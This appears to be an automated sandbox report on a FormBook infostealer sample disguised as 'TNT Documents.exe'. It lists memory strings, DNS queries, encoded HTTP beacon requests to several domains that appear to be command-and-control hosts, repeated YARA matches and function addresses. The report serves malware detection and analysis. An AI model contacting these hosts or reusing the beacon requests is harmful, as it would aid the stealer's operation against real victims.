Source: TNT Documents.exe, 00000000.00000003.267219915.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267251164.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267168059.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267284938.0000000005482000.00000004.00000001.sdmp String found in binary or memory: http://www.urwpp.der
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: TNT Documents.exe, 00000000.00000003.259236141.000000000547E000.00000004.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn9
Source: TNT Documents.exe, 00000000.00000003.259236141.000000000547E000.00000004.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cno.
Source: unknown DNS traffic detected: queries for: www.cortepuroiberico.com
Source: global traffic HTTP traffic detected: GET /how6/?iN9tFB=6MRiWtHRwAFwDvhVcJAGZD0p4fLcIEcyVDy1Zth0WcmsI64tqWfeZe6Y2j9BcQs7bzR6A9198A==&4h=7n_DRJGxnRd HTTP/1.1Host: www.cortepuroiberico.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /how6/?iN9tFB=xCGPRvAkK+xY+IPwAFenqNjQ2EZcc1A/OJpQ1mtXoxRJ135kHr2e9wYqnwHz38WooRcfQb4d5g==&4h=7n_DRJGxnRd HTTP/1.1Host: www.specialtyplastics.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /how6/?iN9tFB=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGXB5SfKol3UegXCZpg==&4h=7n_DRJGxnRd HTTP/1.1Host: www.metronixmedical.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /how6/?iN9tFB=ViiEyPWfYSojbIItq3CvR44gsAi5K3j61FSCtvXBJNhPIgkqJAzuFuyRGTnTAJ9C7DX1GVbTZg==&4h=7n_DRJGxnRd HTTP/1.1Host: www.coached.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: TNT Documents.exe
.NET source code contains very large strings
Source: TNT Documents.exe, Form1.cs Long String: Length: 22528
Source: 0.0.TNT Documents.exe.70000.0.unpack, Form1.cs Long String: Length: 22528
Source: 0.2.TNT Documents.exe.70000.0.unpack, Form1.cs Long String: Length: 22528
Source: 5.0.TNT Documents.exe.130000.1.unpack, Form1.cs Long String: Length: 22528
Source: 5.0.TNT Documents.exe.130000.2.unpack, Form1.cs Long String: Length: 22528
Source: 5.0.TNT Documents.exe.130000.0.unpack, Form1.cs Long String: Length: 22528
Source: 5.2.TNT Documents.exe.130000.0.unpack, Form1.cs Long String: Length: 22528
Source: 5.0.TNT Documents.exe.130000.3.unpack, Form1.cs Long String: Length: 22528
Source: 7.2.TNT Documents.exe.aa0000.1.unpack, Form1.cs Long String: Length: 22528
Source: 7.0.TNT Documents.exe.aa0000.9.unpack, Form1.cs Long String: Length: 22528
Source: 7.0.TNT Documents.exe.aa0000.2.unpack, Form1.cs Long String: Length: 22528
Source: 7.0.TNT Documents.exe.aa0000.5.unpack, Form1.cs Long String: Length: 22528
Source: 7.0.TNT Documents.exe.aa0000.1.unpack, Form1.cs Long String: Length: 22528
Source: 7.0.TNT Documents.exe.aa0000.7.unpack, Form1.cs Long String: Length: 22528
Uses 32bit PE files
Source: TNT Documents.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_00075ED2 0_2_00075ED2
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_0236C2B0 0_2_0236C2B0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_023699E0 0_2_023699E0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06B10BE0 0_2_06B10BE0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E7CFC8 0_2_06E7CFC8
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E71F09 0_2_06E71F09
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E71498 0_2_06E71498
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E70C38 0_2_06E70C38
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E72DE8 0_2_06E72DE8
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E755E8 0_2_06E755E8
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E76198 0_2_06E76198
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E79A35 0_2_06E79A35
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E7A7E8 0_2_06E7A7E8
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E753F8 0_2_06E753F8
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E793D6 0_2_06E793D6
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E74F28 0_2_06E74F28
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E74F19 0_2_06E74F19
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E73CE0 0_2_06E73CE0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E760E8 0_2_06E760E8
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E748C9 0_2_06E748C9
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E73CDF 0_2_06E73CDF
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E748D8 0_2_06E748D8
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E70040 0_2_06E70040
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E70006 0_2_06E70006
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E70C0D 0_2_06E70C0D
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E75408 0_2_06E75408
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E755D8 0_2_06E755D8
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E72DAA 0_2_06E72DAA
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E719A8 0_2_06E719A8
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E72D81 0_2_06E72D81
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E75160 0_2_06E75160
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E76155 0_2_06E76155
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E75150 0_2_06E75150
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E7AD08 0_2_06E7AD08
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_0007958F 0_2_0007958F
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_00074D8E 0_2_00074D8E
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 5_2_00135ED2 5_2_00135ED2
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 5_2_0013958F 5_2_0013958F
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 5_2_00134D8E 5_2_00134D8E
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_00401030 7_2_00401030
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_00408C8B 7_2_00408C8B
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_00408C90 7_2_00408C90
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_00402D87 7_2_00402D87
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_00402D90 7_2_00402D90
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_00402FB0 7_2_00402FB0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_00AA5ED2 7_2_00AA5ED2
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155F900 7_2_0155F900
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01574120 7_2_01574120
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0162E824 7_2_0162E824
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01611002 7_2_01611002
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_016228EC 7_2_016228EC
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0156B090 7_2_0156B090
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_016220A8 7_2_016220A8
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015820A0 7_2_015820A0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01622B28 7_2_01622B28
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0161DBD2 7_2_0161DBD2
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158EBB0 7_2_0158EBB0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_016222AE 7_2_016222AE
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01621D55 7_2_01621D55
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01622D07 7_2_01622D07
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01550D20 7_2_01550D20
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0156D5E0 7_2_0156D5E0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_016225DD 7_2_016225DD
